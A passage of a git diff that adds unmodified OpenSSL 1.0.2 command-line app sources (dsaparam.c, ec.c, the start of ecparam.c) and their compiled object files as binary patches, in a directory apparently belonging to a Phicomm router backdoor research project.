+static int MS_CALLBACK dsa_cb(int p, int n, BN_GENCB *cb)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(cb->arg, &c, 1);
+    (void)BIO_flush(cb->arg);
+# ifdef LINT
+    p = n;
+# endif
+# ifdef GENCB_TEST
+    if (stop_keygen_flag)
+        return 0;
+# endif
+    return 1;
+}
+#else                           /* !OPENSSL_NO_DSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.o
new file mode 100644
index 0000000000000000000000000000000000000000..017180f1dd164c32da30cbd03d2117bb4e386337
GIT binary patch
literal 13912
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
XQmFPHR-;I`U6q(n6Z|TFQ0@N<^{`3?

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.c
new file mode 100644
index 0000000..b04dada
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.c
@@ -0,0 +1,365 @@
+/* apps/ec.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/evp.h>
+# include <openssl/pem.h>
+
+# undef PROG
+# define PROG    ec_main
+
+/*-
+ * -inform arg    - input format - default PEM (one of DER, NET or PEM)
+ * -outform arg   - output format - default PEM
+ * -in arg        - input file - default stdin
+ * -out arg       - output file - default stdout
+ * -des           - encrypt output if PEM format with DES in cbc mode
+ * -text          - print a text version
+ * -param_out     - print the elliptic curve parameters
+ * -conv_form arg - specifies the point encoding form
+ * -param_enc arg - specifies the parameter encoding
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int ret = 1;
+    EC_KEY *eckey = NULL;
+    const EC_GROUP *group;
+    int i, badops = 0;
+    const EVP_CIPHER *enc = NULL;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, text = 0, noout = 0;
+    int pubin = 0, pubout = 0, param_out = 0;
+    char *infile, *outfile, *prog, *engine;
+    char *passargin = NULL, *passargout = NULL;
+    char *passin = NULL, *passout = NULL;
+    point_conversion_form_t form = POINT_CONVERSION_UNCOMPRESSED;
+    int new_form = 0;
+    int asn1_flag = OPENSSL_EC_NAMED_CURVE;
+    int new_asn1_flag = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    engine = NULL;
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        } else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        } else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-conv_form") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ++argv;
+            new_form = 1;
+            if (strcmp(*argv, "compressed") == 0)
+                form = POINT_CONVERSION_COMPRESSED;
+            else if (strcmp(*argv, "uncompressed") == 0)
+                form = POINT_CONVERSION_UNCOMPRESSED;
+            else if (strcmp(*argv, "hybrid") == 0)
+                form = POINT_CONVERSION_HYBRID;
+            else
+                goto bad;
+        } else if (strcmp(*argv, "-param_enc") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ++argv;
+            new_asn1_flag = 1;
+            if (strcmp(*argv, "named_curve") == 0)
+                asn1_flag = OPENSSL_EC_NAMED_CURVE;
+            else if (strcmp(*argv, "explicit") == 0)
+                asn1_flag = 0;
+            else
+                goto bad;
+        } else if (strcmp(*argv, "-param_out") == 0)
+            param_out = 1;
+        else if (strcmp(*argv, "-pubin") == 0)
+            pubin = 1;
+        else if (strcmp(*argv, "-pubout") == 0)
+            pubout = 1;
+        else if ((enc = EVP_get_cipherbyname(&(argv[0][1]))) == NULL) {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg     input format - "
+                   "DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg    output format - "
+                   "DER or PEM\n");
+        BIO_printf(bio_err, " -in arg         input file\n");
+        BIO_printf(bio_err, " -passin arg     input file pass "
+                   "phrase source\n");
+        BIO_printf(bio_err, " -out arg        output file\n");
+        BIO_printf(bio_err, " -passout arg    output file pass "
+                   "phrase source\n");
+        BIO_printf(bio_err, " -engine e       use engine e, "
+                   "possibly a hardware device.\n");
+        BIO_printf(bio_err, " -des            encrypt PEM output, "
+                   "instead of 'des' every other \n"
+                   "                 cipher "
+                   "supported by OpenSSL can be used\n");
+        BIO_printf(bio_err, " -text           print the key\n");
+        BIO_printf(bio_err, " -noout          don't print key out\n");
+        BIO_printf(bio_err, " -param_out      print the elliptic "
+                   "curve parameters\n");
+        BIO_printf(bio_err, " -conv_form arg  specifies the "
+                   "point conversion form \n");
+        BIO_printf(bio_err, "                 possible values:"
+                   " compressed\n");
+        BIO_printf(bio_err, "                                 "
+                   " uncompressed (default)\n");
+        BIO_printf(bio_err, "                                  " " hybrid\n");
+        BIO_printf(bio_err, " -param_enc arg  specifies the way"
+                   " the ec parameters are encoded\n");
+        BIO_printf(bio_err, "                 in the asn1 der " "encoding\n");
+        BIO_printf(bio_err, "                 possible values:"
+                   " named_curve (default)\n");
+        BIO_printf(bio_err, "                                  "
+                   "explicit\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+
+    BIO_printf(bio_err, "read EC key\n");
+    if (informat == FORMAT_ASN1) {
+        if (pubin)
+            eckey = d2i_EC_PUBKEY_bio(in, NULL);
+        else
+            eckey = d2i_ECPrivateKey_bio(in, NULL);
+    } else if (informat == FORMAT_PEM) {
+        if (pubin)
+            eckey = PEM_read_bio_EC_PUBKEY(in, NULL, NULL, NULL);
+        else
+            eckey = PEM_read_bio_ECPrivateKey(in, NULL, NULL, passin);
+    } else {
+        BIO_printf(bio_err, "bad input format specified for key\n");
+        goto end;
+    }
+    if (eckey == NULL) {
+        BIO_printf(bio_err, "unable to load Key\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    group = EC_KEY_get0_group(eckey);
+
+    if (new_form)
+        EC_KEY_set_conv_form(eckey, form);
+
+    if (new_asn1_flag)
+        EC_KEY_set_asn1_flag(eckey, asn1_flag);
+
+    if (text)
+        if (!EC_KEY_print(out, eckey, 0)) {
+            perror(outfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+    if (noout) {
+        ret = 0;
+        goto end;
+    }
+
+    BIO_printf(bio_err, "writing EC key\n");
+    if (outformat == FORMAT_ASN1) {
+        if (param_out)
+            i = i2d_ECPKParameters_bio(out, group);
+        else if (pubin || pubout)
+            i = i2d_EC_PUBKEY_bio(out, eckey);
+        else
+            i = i2d_ECPrivateKey_bio(out, eckey);
+    } else if (outformat == FORMAT_PEM) {
+        if (param_out)
+            i = PEM_write_bio_ECPKParameters(out, group);
+        else if (pubin || pubout)
+            i = PEM_write_bio_EC_PUBKEY(out, eckey);
+        else
+            i = PEM_write_bio_ECPrivateKey(out, eckey, enc,
+                                           NULL, 0, NULL, passout);
+    } else {
+        BIO_printf(bio_err, "bad output format specified for " "outfile\n");
+        goto end;
+    }
+
+    if (!i) {
+        BIO_printf(bio_err, "unable to write private key\n");
+        ERR_print_errors(bio_err);
+    } else
+        ret = 0;
+ end:
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free_all(out);
+    if (eckey)
+        EC_KEY_free(eckey);
+    if (passin)
+        OPENSSL_free(passin);
+    if (passout)
+        OPENSSL_free(passout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else                           /* !OPENSSL_NO_EC */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.o
new file mode 100644
index 0000000000000000000000000000000000000000..bae22972d2269d840d0231bfbf6cd43598a83fb6
GIT binary patch
literal 1072
zcmbVL%}T^D5T0(<-;>@1FZHCN8@m1=dXU1h?nT7Qir2Olg{42VDY%#Q6?_yQVPDB7
z(3v*DkhFphOlIcGd^3}zeH-82^c)A2IB*R=kwO7JG|;bMA2wkFU@{tAxd+p*N=4;f
z@>A{&h8I;G4i_gL_s$L*xT)1gvxT~XI=P!d4`4|cL;X#teIGu*+HzRy#8eZjw+QR#
z#_FkT0)tf>M1<i)mc$W{0C+i1L=d7CMPpx-C*oHD{3#Ft@USd_M_H1@DPn0RVvd(G
zC`Ay>Wc-{~JTJ05F2vkw_IF?xDRh_SiTsXI+OyXgd$<y2zL#I`+Kb8G$CP!{|MHKK
zOEo=IU3?iF=^*;5zq02Vrl-#IK=Tz(L1T2*P|YtZmkF-4%FtPLp?W5l_TOdFQd;6E
hC1^+D_{UjyM_c!DQ1e~Q`L{dx4>IwQifLl<zX1~jHxvK>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.c
new file mode 100644
index 0000000..06ac77b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.c
@@ -0,0 +1,662 @@
+/* apps/ecparam.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC
+# include <assert.h>
+# include <stdio.h>
+# include <stdlib.h>
+# include <time.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/ec.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# undef PROG
+# define PROG    ecparam_main
+
+/*-
+ * -inform arg      - input format - default PEM (DER or PEM)
+ * -outform arg     - output format - default PEM
+ * -in  arg         - input file  - default stdin
+ * -out arg         - output file - default stdout
+ * -noout           - do not print the ec parameter
+ * -text            - print the ec parameters in text form
+ * -check           - validate the ec parameters
+ * -C               - print a 'C' function creating the parameters
+ * -name arg        - use the ec parameters with 'short name' name
